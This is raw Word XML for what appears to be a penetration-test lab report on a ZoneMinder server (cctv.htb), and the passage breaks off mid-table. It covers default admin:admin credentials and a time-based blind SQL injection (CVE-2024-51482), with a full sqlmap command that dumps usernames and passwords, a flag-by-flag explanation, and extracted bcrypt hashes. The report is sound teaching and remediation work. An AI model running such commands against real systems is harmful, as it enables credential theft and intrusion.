      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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0C6">
            <w:pPr>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEVERITY RATING: HIGH</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Description</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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ZoneMinder was installed and left with its factory default credentials: username "admin" and password "admin". Default credentials are publicly documented — anyone who knows the software name can search online and find them within seconds. This requires no technical skill whatsoever to exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">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Why Is This Rated HIGH?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:spacing w:after="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finding is rated HIGH because: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exploitable from anywhere over the internet — no physical access required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requires absolutely no technical skill — just typing a known username and password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immediately grants full administrator access to the ZoneMinder application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was the entry point that made every other attack in this chain possible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not rated Critical because on its own it does not give server-level (root) access — only web application admin access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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Evidence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">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ZoneMinder login page was found by clicking the Staff Login button on the SecureVision homepage. The credentials admin:admin were entered as the very first test — this is standard practice when assessing any web application:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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0542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4: Full ZoneMinder admin dashboard — obtained immediately with admin:admin. Version v1.37.63 visible top right</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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Remediation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Change the admin password immediately to a strong, randomly generated password of at least 16 characters. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Implement account lockout after 5 failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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 Enable multi-factor authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="16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All software should force a password change on first login.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:spacing w:after="13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References: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-521: Weak Password Requirements  |  OWASP A07:2021 — Identification and Authentication Failures</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Bdr>
          <w:bottom w:color="c00000" w:space="1" w:sz="8" w:val="single"/>
        </w:pBd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10" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 2 — SQL Injection (CVE-2024-51482)  ·  CRITICAL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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0E1">
            <w:pPr>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEVERITY RATING: CRITICAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">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What Is SQL Injection?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">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SQL (Structured Query Language) is the language used to communicate with databases. When a web application takes input from a user and passes it directly to a database without checking it first, an attacker can insert their own database commands into that input. This is called SQL injection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">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In this case, the "tid" (tag ID) parameter in ZoneMinder's event tag removal page was not validated. By injecting extra SQL commands into this field, I was able to instruct the database to return all usernames and passwords — data it was never supposed to share with a regular user.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">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Why Is This Rated CRITICAL?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:spacing w:after="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finding is rated CRITICAL because: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exploitable remotely over the internet without physical access to the system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requires only a valid authenticated session — which was obtained through the default credentials in Finding 1</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resulted in the complete extraction of all user credentials from the database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stolen password hashes led directly to SSH access and ultimately full root compromise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attacker could also use this to modify or delete all database records</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">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Step-by-Step Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — The session cookie (ZMSESSID) was extracted from the browser developer tools. This cookie proves to the server that I am logged in and was required for the SQLMap attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I identified the ZoneMinder version as v1.37.63 from the dashboard, researched known CVEs for that version, and found CVE-2024-51482 which documented this specific endpoint and parameter as vulnerable to time-based blind SQL injection. I then used SQLMap to confirm and exploit it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4114800" cy="4352925"/>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11480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5: Firefox Developer Tools (Network tab) showing the ZMSESSID session cookie in the response headers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">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2 — SQLMap was run against the vulnerable endpoint with the session cookie:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="828675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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054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6: SQLMap command targeting the CVE-2024-51482 vulnerable parameter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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0F6">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sqlmap -u "http://cctv.htb/zm/index.php?view=request&amp;request=event&amp;action=removetag&amp;tid=1" -D zm -T Users -C Username,Password --dump --batch --dbms=MySQL --technique=T --cookie="ZMSESSID=9d3bgjk7428dok14t6utj3ffkl"--time-sec=5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F8">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0F9">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FA">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-u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FB">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Specifies the target URL. The "tid=1" at the end is the parameter being tested for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C">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-D zm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FD">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tells SQLMap to target the specific database named "zm" (the ZoneMinder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FE">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0FF">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Targets the specific table named "Users" inside the zm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0">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-C Username,Password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1">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Specifies the exact columns to extract — only Username and Password are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2">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--dump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3">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Instructs SQLMap to retrieve and display the data from the targeted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4">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5">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Runs SQLMap in automated mode — answers all prompts with the default option without requiring manual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6">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--dbms=MySQL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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tells SQLMap the database type is MySQL — skips detection and speeds up the attack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8">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--technique=T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09">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Restricts the injection technique to Time-Based Blind only — the technique that works for this vulnerability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A">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--cookie="ZMSESSID=..."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0B">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Provides the authenticated session cookie so SQLMap appears as a logged-in user to the server</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec=5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets the delay threshold to 5 seconds for time-based blind SQL injection. Since the database returns no visible data, SQLMap injects a SLEEP(5) command and measures whether the server pauses. A 5-second response means the injected condition was true, allowing SQLMap to extract data one character at a time through yes/no timing responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:spacing w:after="0" w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">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3 — SQLMap successfully extracted all three user records:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="2581275"/>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3054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7: SQLMap output — all three usernames and bcrypt password hashes extracted from the zm.Users table</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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120"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1600"/>
            <w:gridCol w:w="8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12">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13">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Bcrypt Password Hash (Stolen)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14">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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15">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m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16">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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17">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.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18">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">superadmin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center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
